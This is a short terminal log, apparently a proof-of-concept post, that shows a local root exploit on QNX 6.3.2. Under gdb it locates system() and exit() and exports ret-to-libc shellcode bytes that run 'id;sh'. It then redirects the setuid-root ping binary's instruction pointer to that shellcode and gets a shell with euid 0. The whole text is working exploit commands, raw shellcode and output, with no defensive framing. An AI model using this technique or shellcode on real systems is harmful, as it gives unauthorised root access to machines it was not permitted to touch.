bash-2.05a$ uname -a
QNX muh 6.3.2 2006/03/16-14:19:50EST x86pc x86 
bash-2.05a$ gdb -q /usr/bin/ping # we use some ret-to-libc-type-shellcode
(gdb) p system
$1 = {<text variable, no debug info>} 0xb031897c <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb0321ff8 <exit>
(gdb) q
bash-2.05a$ export SHELLCODE=`perl -e 'print "\xeb\x11\xb9\x7c\x89\x31\xb0\xff\xd1\x31\xc9\x51\xb9\xf8\x1f\x32\xb0\xff\xd1\xe8\xea\xff\xff\xffid;sh"'`
bash-2.05a$ ls -l /usr/bin/ping
-rwsrwxr-x  1 root      root          36172 Dec 09  2004 /usr/bin/ping
bash-2.05a$ gdb -q /usr/bin/ping
(gdb) break main
Breakpoint 1 at 0x8049321
(gdb) r
Starting program: /usr/bin/ping 
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(gdb) cont
Continuing.
(no debugging symbols found)...(no debugging symbols found)...[Switching to process 4157479]

Breakpoint 1, 0x08049321 in main ()
(gdb) x/1000sw $sp
[snip]
0x8047e1c:       "SHELLCODE=\021|\21111Q\0372id;sh"
[snip]
(gdb) x/sw 0x8047e1c+10
0x8047e26:       "\021|\21111Q\0372id;sh"
(gdb) set $eip=0x8047e26
(gdb) cont
Continuing.
uid=100(kokanin) gid=100(users) euid=0(root)
# lol lol
sh: lol: not found
# 